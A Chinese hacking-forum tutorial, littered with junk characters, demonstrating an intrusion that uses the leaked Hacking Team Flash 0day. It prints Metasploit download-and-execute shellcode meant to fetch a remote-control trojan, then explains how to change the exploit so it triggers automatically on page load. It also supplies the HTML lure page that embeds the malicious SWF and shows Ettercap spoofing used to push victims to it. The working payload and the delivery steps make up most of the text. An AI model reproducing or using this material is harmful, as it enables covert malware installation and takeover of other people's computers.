三、flash 0day之手工代码修改制作下载者实例入侵演示
7 M! d, d- q1 \1 M$ t0 r; C. x, ]3 n5 F& N) y 利用到的工具:
Msf
; B9 I' Z# A' \8 K# \" k2 ^2 x+ o Ettercap
7 n* o% C% o8 w& AAdobe Flash CS6 + O& C2 u) n4 F+ |) v
2 K; N( g" \: C @; L! ~. fr& ]/ t) [, Q0 C Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
9 e! M, f& s( e5 h5 I' L/ O" p4 E+ F' ^3 \ q7 ?! @& o4 A 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
% ^; S; h( v" j. I3 v7 Q0 w 如图:
% K, x9 n( Q1 a+ v
5 E+ I0 i Z& O% r1 n8 @, @9 x. { d ~* t
5 ^, U& N5 k k& A
7 k! X+ U, p* V; c 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: e- t9 `3 m u/ g7 l
$ O6 N+ m5 P& N$ w, e; R2 `# [8 w ' S2 z7 L- l) J2 G7 Q r" {
$ v$ H$ n2 A. B! A
0 F: }& d% B" D) y1 x 然后执行generate -t dword生成shellcode,如下: 8 H6 A) Q( k( }9 \" H0 ]- s7 o6 ?* A
/ r) V9 r) k7 e, ]2 F2 A
复制代码到文本下便于我们一会编辑flash exp,如下:
# x2 f, \9 V. T6 w. Y3 Y, h# o0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ; e% X, H1 a2 u# F
. b! Y# _- l- h4 Y7 v0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 5 U u4 S4 J4 s" O+ _
7 U' e" v% I! l1 y( P( k/ z0 w% e% n- _ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ) J+ K( v+ X$ i2 v0 D5 V
/ N# ?# s* u' O4 v) S- x C0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
& Z/ |! [8 w( c2 b7 k/ \, s3 \' S) |4 U2 K 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
' j) u& T# R% M C1 j- Z3 U" g' \: A* M 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 8 @7 m( \( p7 m! {% u* D
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
' t( `2 s. G- {' b6 q4 {0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 0 g: `4 j) t# A8 w
, x" W9 H0 ~: j" ~# _# l: u8 K1 S, |3 _* Q% J. N) P 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
! u- a% r2 B* I; ~2 Q3 g. d# j6 T$ S% V. z% b v# K
5 X* N1 {" b* p9 V, j: D- n; Y+ G% A$ C3 C
下面我们来修改flash 0day exp,需要修改三个文件,分别为: ! T4 m0 E, E* y
# o( T. M4 N7 s$ J. }& K1 Y z }: i2 C) f$ H; ]: x
3 E1 i- N, W9 e1 W: b3 t
% e) M" \- ]9 X1 Y: m4 |% U 先修改ShellWin32.as,部分源代码如图:
! s+ q+ g3 j- N- n p+ b' \5 `; E0 ~; N. q4 k3 ~6 S$ t! D' J% _. l; B
, O7 N7 s" K1 v" C6 a 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: / g" i) ?: p3 s
I$ p) C1 }5 Y( ?
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
: Y% o' ]/ A# T4 t9 \4 \ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
( o# h9 m! @; mp- U, f" p6 i, H! E3 a1 B! L
5 q* k* p; V$ `( B- A$ ]% f- C$ E: u8 a$ p/ l 3 {: _9 l. D; ~4 x- ]! a
; j' N3 U; C0 z! I( d7 R! y$ j0 S( w
8 b0 b: {4 O, o6 g9 a& Z. m* u9 s* C
: ^7 P+ U" R8 G- n- ~) l) o( a8 K 然后点保存,下面我们来编译一下,打开 9 F1 X( s3 s: h0 s1 w8 |. F; c
) @; O' I! f5 X exp1.fla然后点文件-发布,看看编译没错误
4 a6 I8 w9 J& Z8 u! u 1 c1 _* A; O) C& @/ k
7 A" x7 W1 a0 x- A# R) C2 u2 p7 J" \. j& h3 K/ z1 C5 T 9 |6 v c' m: M
4 j; K& w; H0 z0 `1 @3 h) E
4 q4 S+ u5 l7 E! j" ~4 d 然后我们把生成的
% Y# g* Q0 z# o7 bexp1.swf丢到kailinux 的/var/www/html下: & g; q6 s( e5 K
然后把这段代码好好编辑一下 ! ^- `0 O/ {' ?2 ^0 x$ y% ~
2 I# e' u4 T9 }1 H/ V. ] f7 ?- t; D+ @* z( k/ e
+ p; s& a+ g$ j7 a3 }: r7 M7 W- w# E' W1 A2 Z * I# T1 w; f, G' ~6 B/ t: e
' c r2 y3 n, R) ?7 w+ Z8 A- U5 z$ X" }
8 M7 z9 w) T" Q a
8 s S5 U+ h# Q* L* i! n$ Y: n1 Y1 x- j5 B ) ^% ?& U1 ?& ]: g: @. {% ]1 \% U0 g
0 ]. v5 m, X1 j( w
' g+ K: C) u9 ]5 G: d: _ <!DOCTYPE html>
* _. P: `( ?; D5 X- P" c1 \( g( s9 P% x' b% y _6 x <html> ( F J. J" v. f
. R0 `# @2 [( k3 @1 \ <head>
2 F3 L' M0 a6 k5 J! G <meta http-equiv="Content-Type" content="text/html; - ?2 {/ ?) N; R
6 `' U2 y: z# p/ D! r+ w% vcharset=utf-8"/> % w9 w* C c3 d6 i7 p( A8 F
</head>
<body>
<h2> Please wait, the requested page is loading...</h2> . z ~' k9 f4 }: l; ~: k
& u, _' y! _" i5 A<br>
) v3 F% D; d1 M i0 P<OBJECT
5 D# C3 l- S/ l. R6 j
classid="clsid
27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><
ARAM NAME=movie ! D& [6 w. l- z8 T; E
8 b; c" D1 k& n! A# q VALUE="http://192.168.0.109/exp1.swf"></OBJECT> + q, r3 g2 u0 i( |$ V6 k1 L2 j0 y" [
& k+ w6 w7 L% m P6 o</body>
- J; m% a* }1 R <script> % b( G+ y9 k0 `" |2 ]6 j4 V+ N0 {
setTimeout(function () {
" \" p {" Y' y* ]9 x/ k2 V0 d! C7 \/ Q4 q * S* Q3 u0 l, \# h) ?) [/ @. U0 [
; x1 K/ t2 @7 u* E2 M& twindow.location.reload(); ' I: Y/ j2 ^' a. Y% m; N: @
}, 10000); $ S! ?( C8 G: A+ }$ c3 F
. \/ U/ A B3 d8 s. i2 T$ j3 d% m) j4 f0 j; D2 h P. |& ]+ ^, D" }5 |2 R X u
8 w+ U0 J0 e- O) b" H </script>
! {* C5 W; w8 a. i+ Q </html> ! @+ ?& R: n, W' z
2 m! g6 M/ p9 j; v# K! W6 J- q1 w( @2 a4 [ l! I 2 h) j) w" d) X$ K+ G
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
. H' U2 i- a D: w% C
8 l6 P1 s& F4 u8 p$ x
# g1 u( ~$ B* s; l6 R9 N
% S- ]8 c; E P8 k) O
9 y% J [* t4 z! q' k( q, \2 |$ B8 F& P
- X5 E# r' m! C2 i6 r; a: E 8 ~8 t1 ?, I* n3 J# h3 ^; E3 @& l
2 ^. u* F- A# k6 |2 G% U9 ~' X: X% b; j9 k% }, I+ h 下面我们用ettercap欺骗如图: ) O0 k# j' P/ v* G7 u- q
; S$ C/ ^# g7 m' H; [/ i
& K, \" i- p" T% N* u* l
$ v5 d. l# M( u
; u/ h9 o/ E3 B3 _0 u8 ?8 K) z0 O: e) r% H3 G8 [- t5 [8 y 下面我们随便访问个网站看看: * q: w- S3 k I) _& O6 V5 Q
3 {" K2 ~4 I, S& g- H0 z5 {, I" P+ l8 w! `5 j 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: / I/ M3 d$ q2 Y7 G; g8 o0 Z% u
* ]/ a2 Z. u3 }. c0 G l8 _
8 }6 n+ {3 G" L& Z; l5 ^9 d8 u& \ 我们看另一台, 9 _2 ^! K% W# |
提示这个错误,说明木马是成功被下载执行了,
只是由于某些原因没上线而已。。。 9 O# a. O& q- E7 q2 ^9 V
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |